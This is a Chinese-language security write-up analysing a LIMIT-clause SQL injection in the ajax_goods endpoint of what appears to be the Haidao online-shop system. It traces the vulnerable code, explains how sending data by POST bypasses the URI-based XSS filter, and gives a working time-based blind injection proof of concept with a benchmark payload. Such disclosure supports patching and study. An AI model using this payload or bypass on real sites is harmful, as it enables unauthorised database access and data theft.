漏洞触发点

在/system/module/goods/control/index_control.class.php中第105行:

public function ajax_goods(){

$sqlmap = array();

if($_GET['order']){

$sqlmap['order'] = $_GET['order'] == 'rand' ? 'rand()' : ($_GET['order'] == 'sales' ? $sqlmap['order'] = 'sales desc' : $_GET['order']);

}else{

$sqlmap['order'] = 'sort asc,sku_id desc';

}

if($_GET['statusext']){

$sqlmap['status_ext'] = $_GET['statusext'];

}

if($_GET['catid'] > 0){

$sqlmap['catid'] = $_GET['catid'];

}

if($_GET['limit']){

$options['limit'] = $_GET['limit'];

}else{

$options['limit'] = 5;

}

$result = $this->service->lists($sqlmap,$options);

foreach ($result['lists'] as $key => $value) {

$result['lists'][$key]['thumb'] = thumb($value['thumb'],$_GET['length'],$_GET['length']);

}

echo json_encode($result);

}

可以看到这个ajax_goods里面有很多变量是我们可控的。比如这个

$options['limit'] = $_GET['limit'];

可以看到是取得GET传进来的limit参数的值，并且没有做任何过滤，所以这个 $options['limit']是我们可控的。然后我们跟踪一下这个变量进入到了哪里，可以看到带入到了lists()函数中，我们追踪一下这个函数：

在/system/module/goods/model/service/goods_sku_service.class.php中第535行：

public function lists($sqlmap = array(),$options = array()){

$sqlmap = $this->build_goods_map($sqlmap);

$map = array();

if(!empty($sqlmap['status_ext'])){

$map['status_ext'] = $sqlmap['status_ext'];

unset($sqlmap['status_ext']);

}

$goods_ids = $this->build_goods_ids($sqlmap);

if(isset($sqlmap['price'])){

$map = $this->build_sku_map($sqlmap);

}

$map['sku_id'] = array('IN',$goods_ids);

$map['status'] = array('EQ',1);

$count = $this->index_db->where($map)->count();

$sku_ids = $this->index_db->where($map)->page($options['page'])->order($sqlmap['order'])->limit($options['limit'])->getfield('sku_id',TRUE);

foreach ($sku_ids AS $sku_id) {

$result[] = $this->sku_db->detail($sku_id,TRUE,'goods',false)->show_index()->output();

}

return array('count' => $count,'lists' => $result);

}

我们直接追踪一下limit变量在哪里，我们可以看到这里：

$sku_ids = $this->index_db->where($map)->page($options['page'])->order($sqlmap['order'])->limit($options['limit'])->getfield('sku_id',TRUE);

这里出现了我们的可控的$options['limit'],是被带入到了limit()函数中，我们追踪一下这个函数：

在/haidao/system/library/table.class.php中第1489行：

public function limit($offset,$length=null){

$this->options['limit'] = is_null($length)?$offset:$offset.','.$length;

return $this;

}

就是一个取sql语句中limit值的操作，并没有用什么int之类的来过滤，意味着我们可以在limit后插入任意字符来进行注入，所以这就是个limit注入。

我们稍微fuzz一下，看看语句是怎么样的。

先访问：

http://localhost/index.php?m=goods&c=index&a=ajax_goods&limit=1,2333333

然后我们去看一下数据库中的语句：

SELECT `sku_id` FROM `hd_goods_index` WHERE ( `sku_id` IN () ) AND ( `status` = 1 ) ORDER BY sort asc,sku_id desc LIMIT 1,2333333

可以看到我们成功控制了limit后的语句。不过这条语句是有问题的。因为WHERE ( `sku_id` IN () )这个IN里面没有值，所以会报错。那么怎么解决这个问题呢。因为我是在本地测试的，所以这个商城系统是一个商品都没有的，只要我们添加一个商品就可以了。在实际情况中不会出现这种，毕竟是一个商城系统，你一个商城系统怎么可能连一个商品都没有？

我们去后台添加一个商品，然后再访问这个链接，然后看数据库中的语句：

SELECT `sku_id` FROM `hd_goods_index` WHERE ( `sku_id` IN ('2') ) AND ( `status` = 1 ) ORDER BY sort asc,sku_id desc LIMIT 1,2333333

可以看到IN里面有值了，就不会报错了。

好，那么我们开始进行limit注入,因为不能报错，所以只能用时间盲注来进行注入。

先访问一下payload试试：

http://localhost/haidao/index.php?m=goods&c=index&a=ajax_goods&limit=limit=1,1 procedure analyse(extractvalue(rand(),concat(0x3a,(if(1=1,benchmark(10000000,sha1(1)),1)))),1)*

但是出现了一个这个：

发现是被拦截了，我们看一下拦截函数：

在/system/library/application.class.php中第164行：

private function _xss_check() {

static $check = array('"', '>', '

if($_SERVER['REQUEST_METHOD'] == 'GET' ) {

$temp = $_SERVER['REQUEST_URI'];

} elseif(empty ($_GET['formhash'])) {

$temp = $_SERVER['REQUEST_URI'].file_get_contents('php://input');

} else {

$temp = '';

}

$temp = $_SERVER['REQUEST_URI'];

if(!empty($temp)) {

$temp = strtoupper(urldecode(urldecode($temp)));

foreach ($check as $str) {

if(strpos($temp, $str) !== false) {

error::system_error('request_tainting');

}

}

}

return true;

}

可以看到这是一个xss过滤的函数...不过它过滤了括号，所以就很尴尬了，不过它拦截的是$_SERVER['REQUEST_URI']中的字符串，意味着只要我们用GET方式来传递的话，就肯定要被拦截了，这里想了很久，还是不能绕过这个无括号注入。 那么我们看一下在哪里调用了_xss_check()这个函数： 在该文件的第54行：

private function _init_input() {

if (isset($_GET['GLOBALS']) ||isset($_POST['GLOBALS']) || isset($_COOKIE['GLOBALS']) || isset($_FILES['GLOBALS'])) {

error::system_error('request_tainting');

}

$this->_xss_check();

if(MAGIC_QUOTES_GPC) {

$_GET = dstripslashes($_GET);

$_POST = dstripslashes($_POST);

$_COOKIE = dstripslashes($_COOKIE);

}

if(IS_POST && !empty($_POST)) {

$_GET = array_merge($_GET, $_POST);

}

$_GET['page'] = max(1, intval($_GET['page']));

define('IS_AJAX', ((isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') || !empty($_POST[config('VAR_AJAX_SUBMIT')]) || !empty($_GET[config('VAR_AJAX_SUBMIT')])) ? true : false);

}

在_init_input()这个函数中引用了_xss_check()这个函数，但是这里有一个亮点，让_xss_check()这个函数一点用都没有，就是这样一句：

if(IS_POST && !empty($_POST)) {

$_GET = array_merge($_GET, $_POST);

}

如果存在POST数据的话，就把$_POST和$_GET合并成一个数组并重新赋值给$_GET。这个就可以绕过那个_xss_check()了。比如我们上文提到的

$options['limit'] = $_GET['limit'];

这里的$_GET['limit']其实就是$_POST['limit']和$_GET['limit']的集合，意味着我们传入一个$_POST['limit']，那么这里也是能够取到值的。所以我们将注入语句通过POST来传递的话，因为_xss_check()检测的是$_SERVER['REQUEST_URI']。所以就可以绕过那个检测。

POC

http://localhost/index.php?m=goods&c=index&a=ajax_goods

POST: limit=1,1 procedure analyse(extractvalue(rand(),concat(0x3a,(if(1=1,benchmark(10000000,sha1(1)),1)))),1)

可以看到成功延时了: